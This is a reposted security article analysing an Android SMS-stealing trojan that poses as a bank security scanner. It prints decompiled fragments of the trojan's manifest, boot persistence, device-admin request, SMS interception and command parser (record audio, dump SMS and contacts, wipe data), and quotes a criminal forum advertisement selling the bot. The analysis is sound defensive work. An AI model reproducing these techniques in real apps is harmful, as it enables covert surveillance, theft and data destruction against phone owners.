Geekly Articles each Day
📜 ⬆️ ⬇️

Analysis sms-bot for Android. Part I

Analysis sms-bot for Android. Part I.


image

Introduction
Analysis of smsBot (Android) in order to identify the principle of operation and interesting functionality.
The bot is implemented for the Android platform, the algorithm for opening the application is as follows:

Tools:

Meet the manifesto

Having opened the manifesto, we immediately turn our attention to the system permissions that seemed more interesting to me:
<uses-permission android:name="android.permission.READ_PHONE_STATE" /> <uses-permission android:name="android.permission.CALL_PHONE" /> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.INTERNET" /> <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <uses-permission android:name="android.permission.WRITE_SMS" /> <uses-permission android:name="android.permission.READ_SMS" /> <uses-permission android:name="android.permission.RECEIVE_SMS" /> <uses-permission android:name="android.permission.SEND_SMS" /> <uses-permission android:name="android.permission.READ_CONTACTS" /> <uses-permission android:name="android.permission.RECORD_AUDIO" />

So, our bot reads the state of the phone, processes calls, writes to a USB flash drive, write / read / receive / send SMS, read contact database and record audio. Interesting…

Further, on the manifesto. We see the following code:
 … <service android:name="com.soft360.iService.AService" android:enabled="true" android:exported="false" /> <service android:name="com.soft360.iService.webService" android:enabled="true" android:exported="false" /> <receiver android:name="com.soft360.iService.Alarm" android:enabled="true" android:exported="false" /> <receiver android:name="com.soft360.iService.AutoStart" android:enabled="true" android:exported="false"> <intent-filter> <action android:name="android.intent.action.BOOT_COMPLETED" /> </intent-filter> </receiver> <activity android:theme="@*android:style/Theme.Translucent" android:name="com.BioTechnology.iClientsService.IncomingCallActivity" /> <receiver android:name="com.soft360.Receiver.MyPhoneReceiver"> <intent-filter> <action android:name="android.intent.action.PHONE_STATE" /> </intent-filter> </receiver> <receiver android:name="com.soft360.web.MyAdmin" android:permission="android.permission.BIND_DEVICE_ADMIN"> <intent-filter> <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" /> </intent-filter> <meta-data android:name="android.app.device_admin" android:resource="@layout/policies" /> </receiver> …


See that declared:

The analysis of the manifesto is over. I looked through the resource files, found nothing interesting. Now let's proceed to the analysis of the resulting java-code.
')
Analyzing the code

The bot consists of at least 19 main working classes. As a result of the analysis, I identified the most basic and interesting classes that are responsible for the bot sabotage activity:


MainActivity.java

Before you start analyzing the above classes, let's take a look at the MainActivity class. Let's see what's interesting there.
 Intent localIntent1 = new Intent("android.provider.Telephony.SMS_RECEIVED"); localIntent1.setClass(this, SmsReciever.class); sendBroadcast(localIntent1); Intent localIntent2 = new Intent(this, AService.class); startService(localIntent2); Intent localIntent3 = new Intent(this, webService.class); startService(localIntent3);


Immediately when booting, the bot tries:


Further, on the code we see still an interesting thing:
 Intent localIntent4 = new Intent("android.app.action.ADD_DEVICE_ADMIN"); localIntent4.putExtra("android.app.extra.DEVICE_ADMIN", this.compName); localIntent4.putExtra("android.app.extra.ADD_EXPLANATION", "Additional text explaining why this needs to be added."); startActivityForResult(localIntent4, 1);

It is seen that the bot is trying to add itself as another device administrator.

Attention! Con maneuver
Next in MainActivity.java runs many different patterns to divert the user's eyes, pretending to be an application that supposedly scans the phone for all sorts of mobile vulnerabilities, as well as supposedly updates itself. And all this beauty is given in Portuguese, with the indication of some Australian bank.

In fact, there is no phone scanning, certificates downloading, etc. Only dummy templates are launched that mimic vigorous activity. Here is an example of such a dummy:
  private class template4_task extends AsyncTask<Void, Void, Void> { private template4_task() {} protected Void doInBackground(Void... paramVarArgs) { try { TimeUnit.SECONDS.sleep(5L); return null; } catch (InterruptedException localInterruptedException) { for (;;) { localInterruptedException.printStackTrace(); }

Asintask starts, and there’s a timer that just starts and ... does nothing!

AutoStart Receiver

This receiver starts its work immediately after loading the phone and starts the same actions as were MainActivity:
  Intent localIntent = new Intent("android.provider.Telephony.SMS_RECEIVED"); localIntent.setClass(paramContext, SmsReciever.class); paramContext.sendBroadcast(localIntent); paramContext.startService(new Intent(paramContext, AService.class)); paramContext.startService(new Intent(paramContext, webService.class));


Service aService

This service, by filtering events, registers and launches the smsReciever receiver, which in turn will receive and process all received SMS messages (but about it a bit later).
Here is the evidence:
 final IntentFilter smsFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED"); … this.smsFilter.setPriority(999); this.smsReceiver = new SmsReciever(); registerReceiver(this.smsReceiver, this.smsFilter);


smsReceiver and smsParser

Now go to the more interesting pieces of the bot code. This is a smsReceiver receiver and a separate class for identifying codes from SMS and web admin.

I quote a very stripped-down piece of code from smsReceiver:
 public void onReceive(Context paramContext, Intent paramIntent) { … for (;;) { … { smsParser localsmsParser = smsParser.getInstance(); localsmsParser.setSMSMessage(localSmsMessage.getMessageBody()); if (localsmsParser.isStartSMS()) { localdbActions.setStartSMS(); } … if (localsmsParser.isStopSMS()) { localdbActions.setStopSMS(); } else if (localsmsParser.isStartCALL()) { try { localdbActions.setStartCALL(); } … else if (localsmsParser.isStopCALL()) { try { localdbActions.setStopCALL(); } … else if (localsmsParser.isSmsList()) { localdbActions.sent_smslist_to_server(); } else if (localsmsParser.isCallList()) { localdbActions.sent_Call_Details(); } else if (localsmsParser.isStartRecord()) { if (webServiceRobot.AR != null) { try { webServiceRobot.AR.stop(); webServiceRobot.AR = null; return; } … if (localsmsParser.isStopRecord()) { localdbActions.setStopRecord(); if (webServiceRobot.AR == null) { break; } try { webServiceRobot.AR.stop(); webServiceRobot.AR = null; } … } if (localsmsParser.isSmsSend()) { localdbActions.SendSMS(localSmsMessage.getMessageBody()); } else if (localsmsParser.isContactList()) { localdbActions.sent_call_list_details(); } else { if (!localsmsParser.isWipeData()) { break label592; } localdbActions.make_wipe_data(); ... paramContext.startService(new Intent(paramContext, AService.class)); paramContext.startService(new Intent(paramContext, webService.class)); …


I think detailed comments are not needed. From the code it is clear that:


localsmsParser key element. Therefore, let's look further at the smsParser class:
  private static final String COMMAND_GET_CALL_LIST = "call list"; private static final String COMMAND_GET_CONTACT_LIST = "contact list"; private static final String COMMAND_GET_SMS_LIST = "sms list"; private static final String COMMAND_PING = "ping"; private static final String COMMAND_SEND_SMS = "sendSMS"; private static final String COMMAND_START_RECORD = "start record"; private static final String COMMAND_STOP_RECORD = "stop record"; private static final String COMMAND_WIPE_DATA = "wipe data"; private static final String startCALL = "call start"; private static final String startSMS = "sms start"; private static final String stopCALL = "call stop"; private static final String stopSMS = "sms stop"; private static final String changeNUM = "change num"; private static final int COM_CALL_LIST = 6; private static final int COM_CONTACT_LIST = 10; private static final int COM_NULL = -1; private static final int COM_PING = 12; private static final int COM_SEND_SMS = 9; private static final int COM_SMS_LIST = 5; private static final int COM_START_CALL = 3; private static final int COM_START_RECORD = 7; private static final int COM_START_SMS = 1; private static final int COM_STOP_CALL = 4; private static final int COM_STOP_RECORD = 8; private static final int COM_STOP_SMS = 2; private static final int COM_WIPE_DATA = 11; private static smsParser parser = null;

According to these constants, we can understand what functions our bot can perform. The same commands are given in string and digital form. Most likely, there is a check on the source from which the commands come (SMS or Internet).

webServiceRobot

This class is similar to smsReceiver with the difference that it handles http requests. Almost all the same actions are performed:

Plus sending full device information to the server.

findings

Well, the main pieces of code we have considered. Now let's draw conclusions. The bot is well written and performs a very extensive number of functions. Actually, the announcement from one of the forums for the sale of this bot:
Dear Sirs, we are pleased to offer you a bot for mobile devices. At the moment, the bot is implemented under the Android operating system, we are also happy to inform you that the development of Blackberry is in full swing, and the first beta versions will be in the coming month, all customers on the Android bot on Blackberry will have significant discounts.
Now briefly tell how it works, for those who do not know, after installing on a mobile device, the application instantly tapping into a convenient web-panel with 3g or wi-fi, and also sends an SMS to the control number with the text I am (ICCID + MODEL PHONE). Our bot is implemented in such a way that after entering the system, the user continues to quietly use his phone, all functions are available to him in normal mode. Unlike the famous Perkele, we have no sharpening for certain interception numbers, our bot works through the command system. Commands are given in any way convenient for you, either from the web panel in the presence of the Internet, or SMS from the control number.


Functional:


So, this software is sold, the price of the bot is 4k, complete you get the admin panel configured on your server + control web number + .apk file with a unique interface designed for your needs, as well as ongoing product support. Also, we are ready to consider options for renting and working together for a percentage (please do not knock if you do not have injections and you do not know how to use it). For more information, write to me in the PM your jabber for contact, GPG and OTR are vital.

Dear Sirs. UPDATE released for Android. All customers knock on the update and look forward to new customers.
What's new?
  • Now our application is extremely difficult to delete. When installing the application, the software requests the rights of the device admin, if the holder provides them with them, then the application will be extremely dreary, the services will restart and you will not lose this bot. If they do not provide it, then the application will continue to work as before. For your convenience, an indicator appeared in the admin panel, showing whether admin rights are granted or not.
  • If you have admin rights, it is possible to demolish the phone with the command to the factory settings


Name of sms bots for anti-virus vendors: Trojan-Spy.AndroidOS.Zbot.a / Android.Smssniffer / Android / SpySMS / AndroidOS_SMSREP.B

Nabiev Nurlan (Kazakhstan) , Department of Cybercrime Investigation , PentestIT

Source: https://habr.com/ru/post/231425/

More articles:


All Articles